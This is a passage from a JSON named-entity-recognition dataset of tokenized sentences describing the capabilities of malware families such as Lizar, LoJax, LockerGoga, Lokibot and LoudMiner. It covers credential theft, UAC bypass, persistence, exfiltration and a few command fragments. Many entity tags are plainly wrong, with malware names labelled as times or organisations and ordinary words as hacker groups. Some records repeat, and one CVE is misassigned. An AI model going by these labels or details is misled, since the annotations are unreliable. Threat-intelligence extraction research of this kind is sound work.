"B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LitePower", "can", "use", "various", "API", "calls." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LitePower", "can", "use", "a", "PowerShell", "script", "to", "execute", "commands." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "LitePower", "can", "query", "the", "Registry", "for", "keys", "added", "to", "execute", "COM", "hijacking." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LitePower", "can", "create", "a", "scheduled", "task", "to", "enable", "persistence", "mechanisms." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LitePower", "can", "take", "system", "screenshots", "and", "save", "them", "to", "`%AppData%`." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LitePower", "can", "identify", "installed", "AV", "software." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "LitePower", "has", "the", "ability", "to", "list", "local", "drives", "and", "enumerate", "the", "OS", "architecture." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "B-Features", "O", "O", "B-Features" ] }, { "tokens": [ "LitePower", "can", "determine", "if", "the", "current", "user", "has", "admin", "privileges." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LitePower", "can", "use", "HTTP", "and", "HTTPS", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Lizar", "has", "encrypted", "data", "before", "sending", "it", "to", "the", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lizar", "can", "retrieve", "browser", "history", "and", "database", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lizar", "has", "a", "module", "to", "collect", "usernames", "and", "passwords", "stored", "in", "browsers." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lizar", "can", "decrypt", "its", "configuration", "data." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lizar", "has", "used", "the", "PowerKatz", "plugin", "that", "can", "be", "loaded", "into", "the", "address", "space", "of", "a", "PowerShell", "process", "through", "reflective", "DLL", "loading." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lizar", "can", "collect", "email", "accounts", "from", "Microsoft", "Outlook", "and", "Mozilla", "Thunderbird." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "B-HackOrg" ] }, { "tokens": [ "Lizar", "can", "support", "encrypted", "communications", "between", "the", "client", "and", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lizar", "can", "download", "additional", "plugins,", "files,", "and", "tools." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "B-Features", "O", "O" ] }, { "tokens": [ "Lizar", "can", "run", "Mimikatz", "to", "harvest", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Lizar", "has", "used", "various", "Windows", "API", "functions", "on", "a", "victim's", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lizar", "can", "execute", "PE", "files", "in", "the", "address", "space", "of", "the", "specified", "process." ], "ner_tags": [ "B-SamFile", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lizar", "has", "used", "PowerShell", "scripts." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Lizar", "has", "a", "plugin", "designed", "to", "obtain", "a", "list", "of", "processes." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Lizar", "can", "migrate", "the", "loader", "into", "another", "process." ], "ner_tags": [ "B-Idus", "O", "I-OffAct", "I-OffAct", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "Lizar", "can", "take", "JPEG", "screenshots", "of", "an", "infected", "system." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "Lizar", "can", "search", "for", "processes", "associated", "with", "an", "anti-virus", "product", "from", "list." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lizar", "can", "collect", "the", "computer", "name", "from", "the", "machine,." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lizar", "can", "retrieve", "network", "information", "from", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "B-Purp", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lizar", "has", "a", "plugin", "to", "retrieve", "information", "about", "all", "active", "network", "sessions", "on", "the", "infected", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lizar", "can", "collect", "the", "username", "from", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lizar", "has", "a", "command", "to", "open", "the", "command-line", "on", "the", "infected", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lizar", "has", "a", "plugin", "that", "can", "retrieve", "credentials", "from", "Internet", "Explorer", "and", "Microsoft", "Edge", "using", "`vaultcmd.exe`", "and", "another", "that", "can", "collect", "RDP", "access", "credentials", "using", "the", "`CredEnumerateW`", "function." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LoFiSe", "can", "collect", "files", "into", "password-protected", "ZIP-archives", "for", "exfiltration." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LoFiSe", "can", "collect", "all", "the", "files", "from", "the", "working", "directory", "every", "three", "hours", "and", "place", "them", "into", "a", "password-protected", "archive", "for", "further", "exfiltration." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LoFiSe", "has", "been", "executed", "as", "a", "file", "named", "DsNcDiag.dll", "through", "side-loading." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "LoFiSe", "can", "collect", "files", "of", "interest", "from", "targeted", "systems." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LoFiSe", "can", "monitor", "the", "file", "system", "to", "identify", "files", "less", "than", "6.4", "MB", "in", "size", "with", "file", "extensions", "including", ".doc,", ".docx,", ".xls,", ".xlsx,", ".ppt,", ".pptx,", ".pdf,", ".rtf,", ".tif,", ".odt,", ".ods,", ".odp,", ".eml,", "and", ".msg." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "LoFiSe", "can", "save", "files", "to", "be", "evaluated", "for", "further", "exfiltration", "in", "the", "`C:\\Programdata\\Microsoft\\`", "and", "`C:\\windows\\temp\\`", "folders." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LoJax", "has", "modified", "the", "Registry", "key", "<code>‘HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session", "Manager\\BootExecute’</code>", "from", "<code>‘autocheck", "autochk", "*’</code>", "to", "<code>‘autocheck", "autoche", "*’</code>." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LoJax", "has", "loaded", "an", "embedded", "NTFS", "DXE", "driver", "to", "be", "able", "to", "access", "and", "write", "to", "NTFS", "partitions." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "O", "B-HackOrg" ] }, { "tokens": [ "LoJax", "has", "modified", "the", "Registry", "key", "<code>‘HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session", "Manager\\BootExecute’</code>", "from", "<code>‘autocheck", "autochk", "*’</code>", "to", "<code>‘autocheck", "autoche", "*’</code>", "in", "order", "to", "execute", "its", "payload", "during", "Windows", "startup." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LoJax", "is", "a", "UEFI", "BIOS", "rootkit", "deployed", "to", "persist", "remote", "access", "software", "on", "some", "targeted", "systems." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LoJax", "is", "a", "UEFI", "BIOS", "rootkit", "deployed", "to", "persist", "remote", "access", "software", "on", "some", "targeted", "systems." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LockerGoga", "has", "been", "observed", "changing", "account", "passwords", "and", "logging", "off", "current", "users." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "LockerGoga", "has", "been", "signed", "with", "stolen", "certificates", "in", "order", "to", "make", "it", "look", "more", "legitimate." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LockerGoga", "has", "encrypted", "files,", "including", "core", "Windows", "OS", "files,", "using", "RSA-OAEP", "MGF1", "and", "then", "demanded", "Bitcoin", "be", "paid", "for", "the", "decryption", "key." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LockerGoga", "installation", "has", "been", "immediately", "preceded", "by", "a", "\"task", "kill\"", "command", "in", "order", "to", "disable", "anti-virus." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LockerGoga", "has", "been", "observed", "deleting", "its", "original", "launcher", "after", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LockerGoga", "has", "been", "observed", "moving", "around", "the", "victim", "network", "via", "SMB,", "indicating", "the", "actors", "behind", "this", "ransomware", "are", "manually", "copying", "files", "form", "computer", "to", "computer", "instead", "of", "self-propagating." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LockerGoga", "has", "been", "observed", "shutting", "down", "infected", "systems." ], "ner_tags": [ "B-Time", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Lokibot", "has", "utilized", "multiple", "techniques", "to", "bypass", "UAC." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Lokibot", "has", "stolen", "credentials", "from", "multiple", "applications", "and", "data", "sources", "including", "Windows", "OS", "credentials,", "email", "clients,", "FTP,", "and", "SFTP", "clients." ], "ner_tags": [ "B-Idus", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lokibot", "has", "demonstrated", "the", "ability", "to", "steal", "credentials", "from", "multiple", "applications", "and", "data", "sources", "including", "Safari", "and", "the", "Chromium", "and", "Mozilla", "Firefox-based", "web", "browsers." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Features", "B-Purp", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-Way", "O", "B-Way", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "Lokibot", "has", "decoded", "and", "decrypted", "its", "stages", "multiple", "times", "using", "hard-coded", "keys", "to", "deliver", "the", "final", "payload,", "and", "has", "decoded", "its", "server", "response", "hex", "string", "using", "XOR." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Lokibot", "has", "the", "ability", "to", "initiate", "contact", "with", "command", "and", "control", "(C2)", "to", "exfiltrate", "stolen", "data." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lokibot", "will", "delete", "its", "dropped", "files", "after", "bypassing", "UAC." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lokibot", "can", "search", "for", "specific", "files", "on", "an", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Lokibot", "has", "the", "ability", "to", "copy", "itself", "to", "a", "hidden", "file", "and", "directory." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lokibot", "downloaded", "several", "staged", "items", "onto", "the", "victim's", "machine." ], "ner_tags": [ "B-Way", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lokibot", "has", "the", "ability", "to", "capture", "input", "on", "the", "compromised", "host", "via", "keylogging." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Lokibot", "has", "tricked", "recipients", "into", "enabling", "malicious", "macros", "by", "getting", "victims", "to", "click", "\"enable", "content\"", "in", "email", "attachments." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "O" ] }, { "tokens": [ "Lokibot", "has", "modified", "the", "Registry", "as", "part", "of", "its", "UAC", "bypass", "process." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lokibot", "has", "used", "LoadLibrary(),", "GetProcAddress()", "and", "CreateRemoteThread()", "API", "functions", "to", "execute", "its", "shellcode." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lokibot", "has", "obfuscated", "strings", "with", "base64", "encoding." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lokibot", "has", "used", "PowerShell", "commands", "embedded", "inside", "batch", "scripts." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "Lokibot", "has", "used", "process", "hollowing", "to", "inject", "itself", "into", "legitimate", "Windows", "process." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Lokibot", "has", "reflectively", "loaded", "the", "decoded", "DLL", "into", "memory." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lokibot", "embedded", "the", "commands", "<code>schtasks", "/Run", "/TN", "\\Microsoft\\Windows\\DiskCleanup\\SilentCleanup", "/I</code>", "inside", "a", "batch", "script." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lokibot's", "second", "stage", "DLL", "has", "set", "a", "timer", "using", "“timeSetEvent”", "to", "schedule", "its", "next", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lokibot", "has", "used", "several", "packing", "methods", "for", "obfuscation." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lokibot", "is", "delivered", "via", "a", "malicious", "XLS", "attachment", "contained", "within", "a", "spearhpishing", "email." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Lokibot", "has", "the", "ability", "to", "discover", "the", "computer", "name", "and", "Windows", "product", "name/version." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lokibot", "has", "the", "ability", "to", "discover", "the", "domain", "name", "of", "the", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lokibot", "has", "the", "ability", "to", "discover", "the", "username", "on", "the", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lokibot", "has", "performed", "a", "time-based", "anti-debug", "check", "before", "downloading", "its", "third", "stage." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lokibot", "has", "used", "VBS", "scripts", "and", "XLS", "macros", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "B-Way", "B-Tool", "O", "O" ] }, { "tokens": [ "Lokibot", "has", "used", "HTTP", "for", "C2", "communications." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Lokibot", "has", "used", "<code>cmd", "/c</code>", "commands", "embedded", "within", "batch", "scripts." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LookBack", "side", "loads", "its", "communications", "module", "as", "a", "DLL", "into", "the", "<code>libcurl.dll</code>", "loader." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LookBack", "has", "a", "function", "that", "decrypts", "malicious", "data." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "B-HackOrg", "B-Features" ] }, { "tokens": [ "LookBack", "removes", "itself", "after", "execution", "and", "can", "delete", "files", "on", "the", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "LookBack", "can", "retrieve", "file", "listings", "from", "the", "victim", "machine." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "LookBack", "has", "a", "C2", "proxy", "tool", "that", "masquerades", "as", "<code>GUP.exe</code>,", "which", "is", "software", "used", "by", "Notepad++." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LookBack", "uses", "a", "custom", "binary", "protocol", "over", "sockets", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LookBack", "can", "list", "running", "processes." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "LookBack", "sets", "up", "a", "Registry", "Run", "key", "to", "establish", "a", "persistence", "mechanism." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LookBack", "can", "take", "desktop", "screenshots." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "LookBack", "can", "kill", "processes", "and", "delete", "services." ], "ner_tags": [ "B-Way", "O", "I-Features", "I-Features", "O", "B-Features", "O" ] }, { "tokens": [ "LookBack", "uses", "a", "modified", "version", "of", "RC4", "for", "data", "transfer." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "I-Features", "O" ] }, { "tokens": [ "LookBack", "can", "enumerate", "services", "on", "the", "victim", "machine." ], "ner_tags": [ "B-Way", "O", "B-Features", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "LookBack", "can", "shutdown", "and", "reboot", "the", "victim", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LookBack", "has", "used", "VBA", "macros", "in", "Microsoft", "Word", "attachments", "to", "drop", "additional", "files", "to", "the", "host." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "I-SamFile", "I-SamFile", "B-SecTeam", "O", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "LookBack’s", "C2", "proxy", "tool", "sends", "data", "to", "a", "C2", "server", "over", "HTTP." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LookBack", "executes", "the", "<code>cmd.exe</code>", "command." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "LoudMiner", "has", "obfuscated", "various", "scripts." ], "ner_tags": [ "B-Org", "O", "O", "O", "O" ] }, { "tokens": [ "LoudMiner", "is", "typically", "bundled", "with", "pirated", "copies", "of", "Virtual", "Studio", "Technology", "(VST)", "for", "Windows", "and", "macOS." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LoudMiner", "has", "encrypted", "DMG", "files." ], "ner_tags": [ "B-Time", "O", "O", "B-Way", "O" ] }, { "tokens": [ "LoudMiner", "deleted", "installation", "files", "after", "completion." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LoudMiner", "has", "set", "the", "attributes", "of", "the", "VirtualBox", "directory", "and", "VBoxVmService", "parent", "directory", "to", "\"hidden\"." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LoudMiner", "used", "SCP", "to", "update", "the", "miner", "from", "the", "C2." ], "ner_tags": [ "B-Time", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LoudMiner", "adds", "plist", "files", "with", "the", "naming", "format", "<code>com.[random_name].plist</code>", "in", "the", "<code>/Library/LaunchDaemons</code>", "folder", "with", "the", "RunAtLoad", "and", "KeepAlive", "keys", "set", "to", "<code>true</code>." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LoudMiner", "launched", "the", "QEMU", "services", "in", "the", "<code>/Library/LaunchDaemons/</code>", "folder", "using", "<code>launchctl</code>.", "It", "also", "uses", "<code>launchctl</code>", "to", "unload", "all", "Launch", "Daemons", "when", "updating", "to", "a", "newer", "version", "of", "LoudMiner." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "LoudMiner", "used", "an", "MSI", "installer", "to", "install", "the", "virtualization", "software." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LoudMiner", "used", "the", "<code>ps</code>", "command", "to", "monitor", "the", "running", "processes", "on", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LoudMiner", "harvested", "system", "resources", "to", "mine", "cryptocurrency,", "using", "XMRig", "to", "mine", "Monero." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "I-Purp", "O", "O", "B-Way", "O", "I-Purp", "O" ] }, { "tokens": [ "LoudMiner", "has", "used", "QEMU", "and", "VirtualBox", "to", "run", "a", "Tiny", "Core", "Linux", "virtual", "machine,", "which", "runs", "XMRig", "and", "makes", "connections", "to", "the", "C2", "server", "for", "updates." ], "ner_tags": [ "B-Idus", "O", "O", "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LoudMiner", "started", "the", "cryptomining", "virtual", "machine", "as", "a", "service", "on", "the", "infected", "machine." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LoudMiner", "has", "monitored", "CPU", "usage." ], "ner_tags": [ "B-Time", "O", "O", "O", "O" ] }, { "tokens": [ "LoudMiner", "used", "a", "script", "to", "gather", "the", "IP", "address", "of", "the", "infected", "machine", "before", "sending", "to", "the", "C2." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LoudMiner", "used", "shell", "scripts", "to", "launch", "various", "services", "and", "to", "start/stop", "the", "QEMU", "virtualization." ], "ner_tags": [ "B-Idus", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "B-HackOrg" ] }, { "tokens": [ "LoudMiner", "used", "a", "batch", "script", "to", "run", "the", "Linux", "virtual", "machine", "as", "a", "service." ], "ner_tags": [ "B-Org", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "LoudMiner", "can", "automatically", "launch", "a", "Linux", "virtual", "machine", "as", "a", "service", "at", "startup", "if", "the", "AutoStart", "option", "is", "enabled", "in", "the", "VBoxVmService", "configuration", "file." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "Lslsass", "can", "dump", "active", "logon", "session", "password", "hashes", "from", "the", "lsass", "process." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lucifer", "can", "use", "the", "Stratum", "protocol", "on", "port", "10001", "for", "communication", "between", "the", "cryptojacking", "bot", "and", "the", "mining", "server." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Org", "O" ] }, { "tokens": [ "Lucifer", "can", "clear", "and", "remove", "event", "logs." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "B-Features", "O", "O" ] }, { "tokens": [ "Lucifer", "can", "decrypt", "its", "C2", "address", "upon", "execution." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lucifer", "can", "exploit", "multiple", "vulnerabilities", "including", "EternalBlue", "(CVE-2017-0144)", "and", "EternalRomance", "(CVE-2017-0144)." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "B-Features", "O", "B-Way", "B-Features" ] }, { "tokens": [ "Lucifer", "can", "download", "and", "execute", "a", "replica", "of", "itself", "using", "certutil." ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lucifer", "can", "use", "certutil", "for", "propagation", "on", "Windows", "hosts", "within", "intranets." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Lucifer", "can", "execute", "TCP,", "UDP,", "and", "HTTP", "denial", "of", "service", "(DoS)", "attacks." ], "ner_tags": [ "B-HackOrg", "O", "O", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O", "O", "B-OffAct" ] }, { "tokens": [ "Lucifer", "can", "scan", "for", "open", "ports", "including", "TCP", "ports", "135", "and", "1433." ], 